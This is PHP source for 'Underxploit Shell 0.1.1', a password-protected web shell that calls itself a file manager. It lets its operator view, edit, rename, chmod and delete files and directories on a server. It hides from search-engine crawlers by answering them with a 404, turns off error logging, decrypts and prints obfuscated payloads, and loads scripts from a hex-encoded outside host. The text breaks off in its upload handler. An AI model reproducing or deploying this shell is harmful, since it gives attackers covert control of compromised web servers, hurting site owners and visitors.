UNDERXPLOIT SHELL VERSION 0.1.1

<?php
/*! Description & About
        * Underxploit Shell 0.1.1
        * Responsive Version
        * Source Viewer With Syntax Highligting
        * Simple Gradient Alert
        * Without Log's
        * Clean Url
        * Paralax Cover
        * Programmed By Wildan Izzudin
        * Web Shell (c) 2017
        * Fix On 13, Dec 2017 (Wednesday)
End !*/
error_reporting(0);
// --- pass : underxploit --- //
$pass = "0bdec2f837ad15748be105faaf60db68";
$_POST = cl($_POST);
$_GET = cl($_GET);
$_COOKIE = cl($_COOKIE);
$_COEG = array_merge($_POST, $_GET);
$_COEG = array_map("xp", $_COEG);
$cookie = md5($_SERVER['HTTP_USER_AGENT']);
if(!isset($_COOKIE[md5($_SERVER['HTTP_HOST'])."underxploit"])) {
vb(md5($_SERVER['HTTP_HOST'])."underxploit", $cookie);
}
function vb($k, $v) {
    $_COOKIE[$k] = $v;
    setcookie($k, $v);
}
function mtr($y) {
    echo('<meta http-equiv="refresh" content="1;url='.$y.'"/>');
    return $y;
}
function op($d, $e) {
    $fp = fopen($d, "w");
    $ch = curl_init();
          curl_setopt($ch, CURLOPT_URL, $e);
          curl_setopt($ch, CURLOPT_BINARYTRANSFER, true);
          curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
          curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
          curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
          curl_setopt($ch, CURLOPT_FILE, $fp);
    return curl_exec($ch);
          curl_close($ch);
    fclose($fp);
    ob_flush();
    flush();
}
function deledir($dirname) {
         if (is_dir($dirname))
           $dir_handle = opendir($dirname);
     if (!$dir_handle)
          return false;
     while($file = readdir($dir_handle)) {
           if ($file != "." && $file != "..") {
                if (!is_dir($dirname."/".$file))
                     unlink($dirname."/".$file);
                else
                     deledir($dirname.'/'.$file);
           }
     }
     closedir($dir_handle);
     rmdir($dirname);
     return true;
}
function a($x17) {
@define("x13", "\x31\x33\x33\x37", true);
$x14 = base64_decode($x17);
$x16s = substr($x14, 0, mcrypt_get_iv_size(MCRYPT_RIJNDAEL_128, MCRYPT_MODE_CBC));
$x19 = rtrim(
    mcrypt_decrypt(
        MCRYPT_RIJNDAEL_128,
        hash('sha256', x13, true),
        substr($x14, mcrypt_get_iv_size(MCRYPT_RIJNDAEL_128, MCRYPT_MODE_CBC)), MCRYPT_MODE_CBC, $x16s), "\0");
return $x19;
}
function x($b) {
    $c = a($b);
return $c;
}
@ini_set('error_log',NULL);
@ini_set('log_errors',0);
@ini_set('html_errors',0);
@ini_set('max_execution_time',0);
@ini_set('file_uploads',1);
@set_time_limit(0);
@clearstatcache();
@define("x4", "\x68\x74\x74\x70\x3a\x2f\x2f\x78\x65\x72\x6f\x2e\x65\x73\x79\x2e\x65\x73\x2f\x6d\x65\x2f", true);
@define("x5", "\x64\x69\x72\x3d", true);
@define("x7", "\x63\x6f\x6d\x6d\x61\x6e\x64\x3d", true);
@define("x6", "\x66\x69\x6c\x65\x3d", true);
@define("x9", "\x3c\x64\x69\x76\x20\x63\x6c\x61\x73\x73\x3d\x27\x63\x6f\x4c\x2d\x6f\x70\x74\x69\x6f\x6e\x20\x74\x6f\x70\x27\x3e\x3c\x62\x72\x3e\x3c\x62\x72\x3e\x3c\x62\x72\x3e\x3c\x63\x65\x6e\x74\x65\x72\x3e\x3c\x69\x20\x63\x6c\x61\x73\x73\x3d\x27\x66\x61\x20\x66\x61\x2d\x67\x65\x61\x72\x20\x66\x61\x2d\x33\x78\x20\x66\x61\x2d\x73\x70\x69\x6e\x27\x3e\x3c\x2f\x69\x3e\x3c\x62\x72\x3e\x3c\x62\x72\x3e\x5b\x20\x42\x41\x44\x20\x52\x45\x51\x55\x45\x53\x54\x20\x5d\x3c\x2f\x63\x65\x6e\x74\x65\x72\x3e\x3c\x62\x72\x3e\x3c\x62\x72\x3e\x3c\x62\x72\x3e\x3c\x62\x72\x3e\x3c\x2f\x64\x69\x76\x3e\x3c\x2f\x64\x69\x76\x3e", true);
@define("sec", $pass, true);
if(isset($_COEG['dir'])) {
        $dir = str_replace("\\", "/", $_COEG['dir']);
        @chdir($dir);
    } else {
        $dir = str_replace("\\", "/", getcwd());
}
$dir= str_replace("\\","/", $dir);
$scdir = explode("/", $dir);
function cl($arr){
    $quotes_sybase = strtolower(ini_get('magic_quotes_sybase'));
if(function_exists('get_magic_quotes_gpc') && get_magic_quotes_gpc()){
        if(is_array($arr)){
            foreach($arr as $k=>$v){
                if(is_array($v)) $arr[$k] = cl($v);
                else $arr[$k] = (empty($quotes_sybase) || $quotes_sybase === 'off')? stripslashes($v) : stripslashes(str_replace("\'\'", "\'", $v));
            }
        }
    }
    return $arr;
}
function xp($str){
    return (is_array($str))? array_map("rawurldecode", $str):rawurldecode($str);
}
function r($r) {
    echo('<script>window.location = "'.$r.'";</script>');
    return $r;
}
function s($s) {
    echo 'notif({
                type: "default",
                msg: "<span class=\'alert\'><font color=\'#fff\'>'.$s.'</font>",
                width: "all",
                height: 100,
                position: "center",
            });';
    return $s;
}
function error($text) {
echo '<script> notif({
                type: "default",
                msg: "<span class=\'alert\'><font color=\'#fff\'>'.$text.'</font>",
                width: "all",
                height: 100,
                position: "center",
            });</script>';
return $text;
}
function success($text) {
echo '<script> notif({
                type: "default",
                msg: "<span class=\'alert\'><font color=\'#fff\'>'.$text.'</font>",
                width: "all",
                height: 100,
                position: "center",
            });</script>';
return $text;
}
if(get_magic_quotes_gpc()) {
    function stripslashes_array($array) {
        return is_array($array) ? array_map('stripslashes_array', $array) : stripslashes($array);
}
    $_COEG = stripslashes_array($_COEG);
    $_COOKIE = stripslashes_array($_COOKIE);
}
if(!empty(sec)) {
    if(isset($_COEG['pass']) && (md5($_COEG['pass']) == sec))         vb(md5($_SERVER['HTTP_HOST']), sec);
if(!isset($_COOKIE[md5($_SERVER['HTTP_HOST'])]) || ($_COOKIE[md5($_SERVER['HTTP_HOST'])] != sec))
        login();
}
function login() {
if(!empty($_SERVER['HTTP_USER_AGENT'])) {
        $userAgents = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler");
          if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
          header('HTTP/1.0 404 Not Found');
          exit;
     }
 } die('<html><head>
<title>LOGIN | UNDERXPLOIT SHELL 0.1.1</title>
<link rel="icon" href="http://xero.esy.es/me/favicon.ico" type="image/x-icon" />
<meta property="og:image" content="http://xero.esy.es/me/logo.jpg">
<meta name="viewport" content="width=device-width, initial-scale=1"><meta name="theme-color" content="#3c3b3f">
<script src="http://xero.esy.es/me/jquery-2.js"></script>
<script>baseUrl = window.location.href.split("?")[0]; window.history.pushState("name", "?", baseUrl);</script>
<style>
@import url("https://fonts.googleapis.com/css?family=Cabin");
*{
    box-sizing: border-box;
}
    body {
       font-size: 15px;
        color:#ddd;
        margin:auto;
        font-family: "Cabin";
        color:#ddd;
        margin:auto;
        font-family: "Cabin";
      background:url("http://xero.esy.es/me/bg.jpg") fixed no-repeat;
        background-size: cover;
}
::selection {
    background-color: rgba(201,223,255,0.2);
    color: #ffffff;
}
::-moz-selection {
    background-color: rgba(201,223,255,0.1);
    color: #ffffff;
}
.image {
    width:150px;
    height:150px;
    border-radius: 100%;
    padding:2px;
    border: 1px solid #ddd;
}
.animasi{opacity: 0.2;-webkit-animation-duration:1s;animation-duration:1s;-webkit-animation-fill-mode:both;animation-fill-mode:both}
.animasi.infinite{opacity: 0.2;-webkit-animation-iteration-count:infinite;animation-iteration-count:infinite}
 .animasi:hover{opacity: 0.2;-webkit-animation-duration:0.1s;animation-duration:0.1s;}
        @-webkit-keyframes anim1{from,20%,40%,60%,80%,to{-webkit-animation-timing-function:cubic-bezier(0.215,0.610,0.355,1.000);animation-timing-function:cubic-bezier(0.215,0.610,0.355,1.000)}0%{opacity:0;-webkit-transform:scale3d(.3,.3,.3);transform:scale3d(.3,.3,.3)}20%{-webkit-transform:scale3d(1.1,1.1,1.1);transform:scale3d(1.1,1.1,1.1)}40%{-webkit-transform:scale3d(.9,.9,.9);transform:scale3d(.9,.9,.9)}60%{opacity:1;-webkit-transform:scale3d(1.03,1.03,1.03);transform:scale3d(1.03,1.03,1.03)}80%{-webkit-transform:scale3d(.97,.97,.97);transform:scale3d(.97,.97,.97)}to{opacity:1;-webkit-transform:scale3d(1,1,1);transform:scale3d(1,1,1)}}@keyframes anim1{from,20%,40%,60%,80%,to{-webkit-animation-timing-function:cubic-bezier(0.215,0.610,0.355,1.000);animation-timing-function:cubic-bezier(0.215,0.610,0.355,1.000)}0%{opacity:1;-webkit-transform:scale3d(1.0,1.0,1.0);transform:scale3d(1.0,1.0,1.0)}20%{-webkit-transform:scale3d(1.1,1.1,1.1);transform:scale3d(1.1,1.1,1.1)}40%{-webkit-transform:scale3d(.9,.9,.9);transform:scale3d(.9,.9,.9)}60%{opacity:1;-webkit-transform:scale3d(1.03,1.03,1.03);transform:scale3d(1.03,1.03,1.03)}80%{-webkit-transform:scale3d(.97,.97,.97);transform:scale3d(.97,.97,.97)}to{opacity:1;-webkit-transform:scale3d(1,1,1);transform:scale3d(1,1,1)}}.anim1{-webkit-animation-name:anim1;animation-name:anim1}
input[type=password] {
    padding: 7px;
    background: none;
    border:0px;
    border-bottom: 2px solid #ddd;
    color: #ddd;
    font-family: "Cabin";
    text-align:center;
    font-size:15px;
}
h3 {
    font-weight: 100;
}
.wrap {
    width: 350px;
    background: -moz-linear-gradient(top, rgba(201,223,255,0.1) 0%, rgba(201,223,255,0) 50%, rgba(201,223,255,0.1) 100%); /* FF3.6-15 */
  background: -webkit-linear-gradient(top, rgba(201,223,255,0.1) 0%, rgba(201,223,255,0) 50%, rgba(201,223,255,0.1) 100%); /* Chrome10-25,Safari5.1-6 */
  background: linear-gradient(to bottom, rgba(201,223,255,0.1) 0%, rgba(201,223,255,0) 50%, rgba(201,223,255,0.1) 100%);
  box-shadow: inset 0 0 1px rgba(255,255,255,0.5), 0px 0px 20px rgba(0,0,0,0.5);
   border-radius: 0.3em;
    padding: 10px;
    margin: 20px;
}
::-webkit-input-placeholder { /* Chrome/Opera/Safari */
  color: #ddd;
}
::-moz-placeholder { /* Firefox 19+ */
  color: #ddd;
}
:-ms-input-placeholder { /* IE 10+ */
  color: #ddd;
}
:-moz-placeholder { /* Firefox 18- */
  color: #ddd;
}

/* Design By Wildan Izzudin */
@media screen and (max-width: 2024px) {
    .wrap {
        width: 350px;
                margin-top:160px;
    }
}
@media screen and (max-width: 1024px) {
    .wrap {
        width: 350px;
                margin-top:50px;
    }
}
@media screen and (max-width: 780px) {
    .wrap {
        width: auto;
                margin-top:50px;
    }
}
</style>
</head><body>
<center>
<div class="wrap">
            <h3>Underxploit Shell 0.1.1</h3>
            <img src="http://xero.esy.es/me/logo.jpg" class="image animasi infinite anim1"><br><br>
            <form action="" method="post"><input type="password" placeholder="" name="pass"></div>');
}
?>
<?php
echo('<html><head><title>UNDERXPLOIT SHELL 0.1.1</title><meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=no">
<link rel="icon" href="'.x4.'favicon.ico" type="image/x-icon" />
    <meta property="og:image" content="'.x4.'logo.jpg"><meta name="theme-color" content="#3c3b3f"><link rel="stylesheet" type="text/css" href="'.x4.'style.css"><link rel="stylesheet" type="text/css" href="'.x4.'alert.css"><script type="text/javascript" src="'.x4.'alert.js"></script><script src="//cdnjs.cloudflare.com/ajax/libs/highlight.js/9.12.0/highlight.min.js"></script><link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/font-awesome/4.7.0/css/font-awesome.min.css"/><script type="text/javascript" src="'.x4.'jquery.js"></script>
<script>
    function c(x) {
        window.location = x
        }
</script>');
echo(x("\x73\x66\x38\x76\x34\x4e\x73\x44\x2b\x31\x31\x35\x73\x73\x49\x42\x6e\x61\x43\x42\x6b\x67\x35\x47\x41\x62\x71\x77\x73\x68\x33\x65\x6c\x48\x56\x66\x42\x2f\x4b\x69\x37\x38\x4a\x6e\x4a\x74\x6a\x58\x57\x70\x2b\x30\x67\x38\x67\x41\x38\x70\x59\x76\x46\x71\x6c\x4a\x63\x72\x53\x43\x62\x76\x6a\x65\x49\x63\x39\x76\x32\x4e\x5a\x30\x49\x43\x30\x7a\x2f\x76\x63\x77\x6b\x38\x56\x30\x47\x61\x33\x44\x59\x52\x37\x4a\x39\x38\x77\x46\x78\x2f\x55\x41\x6f\x42\x37\x45\x76\x6b\x62\x6a\x58\x41\x64\x39\x67\x63\x67\x4a\x68\x6e\x34\x4c\x61\x63\x58\x31\x54\x43\x74\x47\x72\x72\x5a\x43\x41\x73\x53\x36\x75\x61\x38\x6d\x43\x78\x7a\x75\x76\x33\x7a\x50\x55\x52\x68\x30\x43\x33\x65\x4e\x7a\x44\x67\x58\x56\x41\x30\x3d"));
echo(x("\x68\x2f\x67\x43\x67\x35\x4b\x57\x39\x33\x55\x57\x39\x70\x78\x58\x4d\x73\x4e\x74\x31\x73\x4f\x6a\x67\x71\x72\x59\x4b\x4f\x4b\x50\x4d\x61\x70\x4a\x56\x78\x4f\x6c\x71\x67\x65\x71\x76\x44\x47\x6d\x72\x65\x6c\x35\x76\x75\x2f\x2f\x33\x52\x76\x50\x6a\x41\x73\x59\x4c\x55\x61\x61\x72\x6f\x79\x44\x67\x61\x72\x77\x51\x74\x42\x70\x69\x6a\x59\x70\x5a\x65\x6d\x4a\x55\x79\x50\x37\x51\x32\x6c\x33\x59\x69\x53\x6e\x67\x49\x36\x64\x71\x2f\x77\x59\x58\x58\x68\x5a\x78\x4e\x74\x64\x6c\x37\x64\x2b\x56\x5a\x66\x68\x76\x46\x4f\x76\x37\x45\x39\x6c\x47\x74\x36\x6b\x44\x41\x45\x55\x6f\x70\x58\x7a\x6f\x70\x6b\x41\x43\x6b\x61\x41\x4f\x52\x32\x76\x77\x32\x39\x67\x72\x50\x34\x47\x6c\x65\x50\x2b\x31\x31\x64\x45\x55\x6b\x77\x79\x2b\x66\x6c\x6c\x32\x53\x73\x5a\x39\x42\x75\x49\x72\x35\x50\x77\x30\x52\x61\x62\x53\x52\x38\x6a\x52\x7a\x50\x62\x59\x6e\x33\x6f\x52\x47\x55\x57\x55\x78\x70\x58\x30\x77\x64\x48\x31\x53\x4b\x47\x73\x6b\x59\x52\x38\x71\x51\x34\x47\x4f\x78\x30\x47\x2b\x56\x42\x72\x58\x2f\x67\x49\x50\x37\x51\x6a\x6d\x75\x55\x47\x54\x43\x39\x78\x4d\x5a\x50\x73\x32\x6f\x6e\x79\x6e\x31\x54\x75\x43\x74\x48\x69\x45\x51\x4a\x38\x51\x6f\x67\x49\x58\x4d\x32\x4f\x79\x72\x53\x4f\x2b\x51\x68\x31\x7a\x62\x4d\x44\x2f\x38\x3d"));
echo('<i class="fa fa-chevron-up move-top"></i>');
echo('<script>
jQuery(document).ready(function() {
    var offset = 220;
    var duration = 500;
    jQuery(window).scroll(function() {
        if (jQuery(this).scrollTop() > offset) {
            jQuery(\'.move-top\').fadeIn(duration);
        } else {
            jQuery(\'.move-top\').fadeOut(duration);
        }
    });
    jQuery(\'.move-top\').click(function(event) {
        event.preventDefault();
        jQuery(\'html, body\').animate({scrollTop: 0}, duration);
        return false;
    })
});
</script>');
echo('<script>hljs.initHighlightingOnLoad();</script>
</head></body>
<div class="co-ontainer-2">
<div class="atas">
<div class="menus">
<button class="xa" onclick=\'c("'.$_SERVER['PHP_SELF'].'")\'><i class="fa fa-home"></i></button>
<button class="xa" onclick=\'c("?'.x5.getcwd().'&'.x7.'about")\'><i class="fa fa-question"></i></button>
<button class="xa" onclick=\'c("?'.x5.getcwd().'&'.x7.'logout")\'><i class="fa fa-power-off"></i></button></div></div>
<div class="dir">
<table style="width:100%">
<td style="width:100%"><div class="dir-pallet"><table><td class="dir-td-left"><font color="#ddd">ROOT</font> :</td><td class="dir-td-right break wrap">');
foreach($scdir as $c_dir => $cdir) {
    echo "<a class='a' onclick=\"c('?dir=";
    for($i = 0; $i <= $c_dir; $i++) {
        echo $scdir[$i];
        if($i != $c_dir) {
        echo "/";
        }
    }
    echo "')\">$cdir</a>/";
}
echo("</td></table></div></th></table></div>");
$filez = basename($_COEG['file']);
$size = filesize("$dir/$filez")/1024;
            $size = round($size,3);
            if($size > 1024) {
                $size = round($size/1024,2). ' MB';
            } else {
                $size = $size. ' KB';
}
echo('<div class="coL">');
if($_COEG['command'] == 'logout') {
r($_SERVER['PHP_SELF']);
setcookie(md5($_SERVER['HTTP_HOST']), 'underxploit', time() - 3600);
}
elseif($_COEG['command'] == 'view') {
echo '<div class="coL-panel"><table>
<td class="td-panel"><center><div class="loader"></div></center></td><td class="td-panel-right">SOURCE VIEWER</td></table></div>';
echo '<div class="coL-option">';
echo '<table><td align="center" style="width:30px"><i class="fa fa-file-o"></i> </td><td class="break"><font color="lime">[</font> '.basename($_COEG['file']).' <font color="lime">]</font></td><td style="width:90px" class="coL-option-panel" align="center">'.$size.'</td></table>
<hr>';
echo "<table><th><button class='coL-btn-option-active'><i class='fa fa-eye'></i></button></th>
<th><a onclick=\"c('?".x7."edit&".x5.$dir."&".x6.$_COEG['file']."')\"><button class='coL-btn-option'><i class='fa fa-pencil'></i></button></a></th>
<th><a onclick=\"c('?".x7."rename&".x5.$dir."&".x6.$_COEG['file']."')\"><button class='coL-btn-option'><i class='fa fa-edit'></i></button></a></th>
<th><a onclick=\"c('?".x7."chmod&".x5.$dir."&".x6.$_COEG['file']."')\"><button class='coL-btn-option'><i class='fa fa-cogs'></i></button></a></th>
<th><a onclick=\"c('?".x7."delete&".x5.$dir."&".x6.$_COEG['file']."')\"><button class='coL-btn-option'><i class='fa fa-trash'></i></button></a></th></table></div>";
$source = htmlspecialchars(@file_get_contents($_COEG['file']));
if(empty($source)) {
    error('Source Not Found !!');
    echo x9;
} else {
    echo "<pre class='top'><code class='php'>".$source."</code></pre></div>";
    }
}
elseif($_COEG['command'] == 'edit') {
    if($_COEG['save']) {
        $save = file_put_contents($_COEG['file'], $_COEG['src']);
    if($save) {
    success('Source Saved !!');
        } else {
    error('Permission Denied !!');
    }
}
echo '<div class="coL-panel"><table>
<td class="td-panel"><center><div class="loader"></div></center></td><td class="td-panel-right">EDIT FILE</td></table></div>';
echo '<div class="coL-option">
<table><td align="center" style="width:30px"><i class="fa fa-file-o"></i> </td><td class="break"><font color="lime">[</font> '.basename($_COEG['file']).' <font color="lime">]</font></td><td style="width:90px" class="coL-option-panel" align="center">'.$size.'</td></table>
<hr><table>';
echo "<th><a onclick=\"c('?".x7."view&".x5.$dir."&".x6.$_COEG['file']."')\"><button class='coL-btn-option'><i class='fa fa-eye'></i></button></a></th>
<th><button class='coL-btn-option-active'><i class='fa fa-pencil'></i></button></th>
<th><a onclick=\"c('?".x7."rename&".x5.$dir."&".x6.$_COEG['file']."')\"><button class='coL-btn-option'><i class='fa fa-edit'></i></button></a></th>
<th><a onclick=\"c('?".x7."chmod&".x5.$dir."&".x6.$_COEG['file']."')\"><button class='coL-btn-option'><i class='fa fa-cogs'></i></button></a></th>
<th><a onclick=\"c('?".x7."delete&".x5.$dir."&".x6.$_COEG['file']."')\"><button class='coL-btn-option'><i class='fa fa-trash'></i></button></a></th></table></div>";
$source = htmlspecialchars(@file_get_contents($_COEG['file']));
if(empty($source)) {
    echo "<form method='post' action='?".x7."edit&".x5.$dir."&".x6.$_COEG['file']."'  style='margin:0px'>
    <textarea name='src' placeholder='# Put your code here...' class='top'></textarea><br>
<input type='submit' class='btn-exe' value='Save' name='save' style='margin-top:3px;width: 100%'></form></div>";
} else { echo "<form method='post' action='?".x7."edit&".x5.$dir."&".x6.$_COEG['file']."' style='margin:0px'>
    <textarea name='src' class='top'>".$source."</textarea>
<input type='submit' value='Save' name='save' class='btn-exe' style='margin-top:3px;width: 100%'></form></div>";
  }
}
elseif($_COEG['command'] == 'rename') {
        if($_COEG['rename']) {
        $rename = rename($_COEG['file'], "$dir/".htmlspecialchars($_COEG['rename'])."");
        if($rename) {
success('File Renamed !!');
mtr("?".x7."rename&".x5.$dir."&".x6.$dir."/".$_COEG["rename"]);
   } else {
error('Permission Denied !!');
        }
}
echo '<div class="coL-panel"><table>
<td class="td-panel"><center><div class="loader"></div></center></td><td class="td-panel-right">RENAME FILE</td></table></div>';
echo '<div class="coL-option"><table><td align="center" style="width:30px"><i class="fa fa-file-o"></i> </td><td class="break"><font color="lime">[</font> '.basename($_COEG['file']).' <font color="lime">]</font></td><td style="width:90px" class="coL-option-panel" align="center">'.$size.'</td></table>
<hr><table>';
echo "<th><a onclick=\"c('?".x7."view&".x5.$dir."&".x6.$_COEG['file']."')\"><button class='coL-btn-option'><i class='fa fa-eye'></i></button></a></th>
<th><a onclick=\"c('?".x7."edit&".x5.$dir."&".x6.$_COEG['file']."')\"><button class='coL-btn-option'><i class='fa fa-pencil'></i></button></a></th>
<th><button class='coL-btn-option-active'><i class='fa fa-edit'></i></button></th>
<th><a onclick=\"c('?".x7."chmod&".x5.$dir."&".x6.$_COEG['file']."')\"><button class='coL-btn-option'><i class='fa fa-cogs'></i></button></a></th>
<th><a onclick=\"c('?".x7."delete&".x5.$dir."&".x6.$_COEG['file']."')\"><button class='coL-btn-option'><i class='fa fa-trash'></i></button></a></th></table></div>";
echo "<div class='coL-option top'>
<br><br><br>
    <center>
        <i class='fa fa-file-o fa-3x'></i></center><br><br>";
echo "<form action='?".x7."rename&".x5.$dir."&".x6.$_COEG['file']."' style='margin:0px' method='post'>
<table cellspacing='0'>
    <td align='center' style='width:10%'><i class='fa fa-file-o'></i> </td><td style='width:70%'><input type='text' value='".basename($_COEG['file'])."' name='rename'></td><td style='width:20%'>
    <button type='submit' class='btn-exe'><i class='fa fa-arrow-circle-right'></i></button></td></table>
    </form></div></div>";
}
else if($_COEG['command'] == 'chmod') {
if(isset($_COEG['perm'])) {
if(chmod($_COEG['file'],octdec($_COEG['perm']))) {
success('Chmod Ok !!');
mtr("?".x7."chmod&".x5.$dir."&".x6.$_COEG['file']);
} else {
error('Permission Denied !!');
    }
}
echo '<div class="coL-panel"><table>
<td class="td-panel"><center><div class="loader"></div></center></td><td class="td-panel-right">CHMOD FILE</td></table></div>';
echo '<div class="coL-option"><table><td align="center" style="width:30px"><i class="fa fa-file-o"></i> </td><td class="break"><font color="lime">[</font> '.basename($_COEG['file']).' <font color="lime">]</font></td><td style="width:90px" class="coL-option-panel" align="center">'.$size.'</td></table>
<hr><table>';
echo "<th><a onclick=\"c('?".x7."view&".x5.$dir."&".x6.$_COEG['file']."')\"><button class='coL-btn-option'><i class='fa fa-eye'></i></button></a></th>
<th><a onclick=\"c('?".x7."edit&".x5.$dir."&".x6.$_COEG['file']."')\"><button class='coL-btn-option'><i class='fa fa-pencil'></i></button></a></th>
<th><a onclick=\"c('?".x7."rename&".x5.$dir."&".x6.$_COEG['file']."')\"><button class='coL-btn-option'><i class='fa fa-edit'></i></button></a></th>
<th><button class='coL-btn-option-active'><i class='fa fa-cogs'></i></button></th>
<th><a onclick=\"c('?".x7."delete&".x5.$dir."&".x6.$_COEG['file']."')\"><button class='coL-btn-option'><i class='fa fa-trash'></i></button></a></th></table></div>";
echo "<div class='coL-option top'>
<br><br><br>
    <center>
        <i class='fa fa-file-o fa-3x'></i></center><br><br>";
echo "<form action='?".x7."chmod&".x5.$dir."&".x6.$_COEG['file']."' style='margin:0px' method='post'>
<table cellspacing='0'>
    <td align='center' style='width:10%'><i class='fa fa-file-o'></i> </td><td style='width:70%'>
<input type='text' value='".substr(sprintf("%o", fileperms($_COEG['file'])), -4)."' name='perm' style='width:100%'>
<input type='hidden' name='path' value='".$_COEG['file']."'></td><td style='width:20%'>
    <button type='submit' class='btn-exe'><i class='fa fa-arrow-circle-right'></i></button></td></table>
    </form></div></div>";
}
elseif($_COEG['command'] == 'delete') {
$delete = unlink($_COEG['file']);
if($delete) {
        echo('<script>c("?'.x5.$dir.'");</script>');
    } else {
        error('Permission Denied !!');
    }
}
elseif($_COEG['command'] == 'change') {
echo('<style> .tup { font-size: 14px; } </style>');
echo('<div class="coL-panel"><table>
<td class="td-panel"><center><div class="loader"></div></center></td><td class="td-panel-right">CHANGE PASSWORD</td></table></div>');
echo('<script>
function validate(){
            var a = document.getElementById("newpass").value;
            var b = document.getElementById("confirm").value;
            if (a!=b) {');
      s('Password Do Not Match !!');
            echo('return false;
    }
}
     </script>');
function xs($file){
    return file_get_contents($file);
}
function chipt($plain){
        return md5($plain);
}
function changepass($plain){
    $npass = chipt($plain);
    $npass = "\$pass = \"".$npass."\";";
    $con = xs($_SERVER['SCRIPT_FILENAME']);
    $con = preg_replace("/\\\$pass\ *=\ *[\"\']*([a-fA-F0-9]*)[\"\']*;/is",$npass,$con);
    return file_put_contents($_SERVER['SCRIPT_FILENAME'], $con);
}

if($_COEG['newpass']) {
if(changepass($_COEG['newpass'])) {
success('Password Changed !!');
mtr('?'.x5.$dir.'&'.x7.'logout');
} else {
error('Unable To Change Password !!');
    }
}
echo "<div class='coL-option top'>
<form method='post' onSubmit='return validate();' action='?".x7."change&".x5.$dir."'><table style='width:100%'>
<td class='tup' style='width:120px'>Password :</td><td style='width:75%'><input type='password' id='newpass' name='newpass' style='width:100%'></td>
<tr>
<td class='tup' style='width:120px'>Confirm :</td><td style='width:75%'><input type='password' id='confirm' name='confirm' style='width:100%'></td>
<tr>
<td style='width:120px'></td><td style='width:75%'>
<button type='submit' name='cps' class='btn-exe' onclick='saveForm();return false;' style='width:100px'><i class='fa fa-arrow-circle-right'></i></button></td></table></form></div></div>";
echo '<script>function saveForm(){
if(document.getElementById("newpass").value == ""){';
       s('Enter New Password !!');
   echo'document.getElementById("newpass").focus();
      return false;
    }
if(document.getElementById("confirm").value == ""){';
      s('Confirm Your Password !!');
   echo'return false;
    }
    document.getElementById("sks").submit();
  }
</script>';
}
elseif($_COEG['command'] == 'kill') {
if(file_exists("underxploit.php"))
unlink("underxploit.php");unlink(__FILE__);
    success('Good Bye Baby :\')');
    mtr('http://underxploit.blogspot.com');
}
elseif($_COEG['command'] == 'renadir') {
   $c = $_COEG['e'];
    if($_COEG['e']) {
        $e = rename($dir, "".dirname($dir)."/".htmlspecialchars($_COEG['e'])."");
        if($e) {
echo('<script>c("?'.x5.dirname($dir).'");</script>');
    } else {
error('Permission Denied !!');
    }
}
echo('<div class="coL-panel"><table>
<td class="td-panel"><center><div class="loader"></div></center></td><td class="td-panel-right">RENAME DIRECTORY</td></table></div>');
echo("<div class='coL-option top'>
<br><br><br>
    <center>
        <i class='fa fa-folder-o fa-3x'></i></center><br><br>");
echo("<form action='?".x7."renadir&".x5.$dir."' style='margin:0px' method='post'>
<table cellspacing='0'>
    <td align='center' style='width:10%'><i class='fa fa-folder-o'></i> </td><td style='width:70%'><input type='text' value='".basename($dir)."' name='e'></td><td style='width:20%'>
    <button type='submit' class='btn-exe'><i class='fa fa-arrow-circle-right'></i></button></td></table>
    </form></div></div>");
}
elseif($_COEG['command'] == 'deledir') {
$x0z1 = deledir($dir);
 if($x0z1) {
        echo("<script>window.location = '?".x5.dirname($dir)."';</script>");
    } else {
        echo("<script>window.location = '?".x5.dirname($dir)."';</script>");
        error('Permission Denied !!');
    }
}
elseif($_COEG['command'] == 'about') {
  echo '<div class="coL-panel"><table>
<td class="td-panel"><center><div class="loader"></div></center></td><td class="td-panel-right">DESCRIPTION</td></table></div>';
echo '<div class="coL-option" style="padding:7px"><br>
    <center><img class="animasi infinite anim1" src="'.x4.'logo.jpg" style="width:150px;height:150px;border-radius:100%;border:1px solid #ddd;padding:2px"></center><br><hr>
&nbsp; &nbsp; Underxploit Shell adalah sebuah script file manager layaknya FTP yang dapat memudahkan anda mengatur isi dari website yang anda kelola, dan pastinya saya rancang sangat responsive dan mudah di akses via apa saja.
<br><br>
&nbsp; &nbsp; Underxploit Shell bisa menjadi solusi ketika anda kesulitan untuk masuk kedalam FTP.
<br><br>
&nbsp; &nbsp; Shell ini adalah recoded dari shell sebelumnya yaitu Mobile Shell V.05, untuk versi 0.1.1 tidak ada tools hacking, namun hanya mengoptimalkan fitur file managernya saja seperti edit, delete, copy dll.
<br><br>
&nbsp; &nbsp; Berbeda dengan Mobile Shell V.05, pada shell ini ada beberapa perubahan tampilan pada background, font, panel icon, cover, navigasi, alert, dan form login.
</div>

<div class="coL-panel top"><table>
<td class="td-panel"><center><div class="loader"></div></center></td><td class="td-panel-right">CREDITS</td></table></div>
<table class="table-info">
<tr class="ex-hov">
<td style="width:85px" class="td-info"><span class="label label-default">+</span> Name</td> <td class="td-info">: Underxploit Shell</td>
<tr class="ex-hov">
<td style="width:85px" class="td-info"><span class="label label-default">+</span> Version</td> <td class="td-info">: 0.1.1 (Beta)</td>
<tr class="ex-hov">
<td style="width:85px" class="td-info"><span class="label label-default">+</span> Author</td> <td class="td-info">: Wildan Izzudin</td>
<tr class="ex-hov">
<td style="width:85px" class="td-info"><span class="label label-default">+</span> Email</td> <td class="td-info break">: <a class="a" href="mailto:underxploit@gmail.com">underxploit@gmail.com</a></td>
<tr class="ex-hov">
<td style="width:85px" class="td-info"><span class="label label-default">+</span> Facebook</td> <td class="td-info break">:  <a class="a" href="http://www.facebook.com/WILDAN.OFFICIAL">http://fb.me/WILDAN.OFFICIAL</a></td>
<tr class="ex-hov">
<td style="width:85px" class="td-info"><span class="label label-default">+</span> Blog</td> <td class="td-info">: <a class="a" href="http://underxploit.blogspot.co.id">http://underxploit.blogspot.co.id</a></td></table>
<div class="coL-option">
<center><br>If there is any suggestion or feedback please contact me through the contact above.<br><br><center><br>&mdash; Thank You &mdash;</center></div></div>';
}

elseif($_COEG['command'] == 'upload') {
echo('<style> .tup { font-size: 14px; } </style>');
echo '<div class="coL-panel"><table>
